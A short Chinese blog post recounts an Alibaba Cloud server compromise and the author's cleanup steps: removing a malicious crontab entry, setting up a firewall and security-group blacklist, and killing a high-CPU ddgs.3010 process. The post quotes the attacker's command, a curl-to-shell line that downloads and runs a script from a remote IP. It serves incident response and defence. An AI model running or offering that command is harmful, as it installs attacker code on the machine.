记一次阿里云黑客攻击事件

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/u012259256/article/details/79840356

这几天服务器一直发生异常行为,阿里云报警如下:



根据执行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,后台某个进程一直从这个美国的IP地址下载sh可执行文件

访问这个地址:http://165.225.157.157:8000/i.sh

看到执行语句如下:


大概明白,意思是定时从这个地址获取sh可执行文件,然后添加到定时任务crontab,还生成了ddgs.3010文件不断后台执行。

So,第一步,查看crontab -l ,果然有


那么显而易见,执行:crontab -r 删除掉cron任务。

第二步,安装firewall,具体操作,参考我的另外一篇博客:https://blog.csdn.net/u012259256/article/details/61018892

限制固定的访问端口:


第三步,其实阿里云后台提供了安全组策略,可以完成防火墙的功能,而且更加方便配置,配置如下(并且把165.225.157.157加入黑名单,不允许访问):



第四步,kill掉这些恶毒的进程,MD

用top命令,实时查看进程占用情况


(PS:因为进程已经被我kill掉,所以看不到数据啦)

没有kill之前,有一个恶意进程CPU占用198%,还有ddgs.3010进程,一直后台运行。总之,找到PID,然后kill就可以!

---------------------------------------------

总结:买了服务器一定记得先安装防火墙,或者设置安全策略!



Yeager

展开阅读全文

没有更多推荐了,返回首页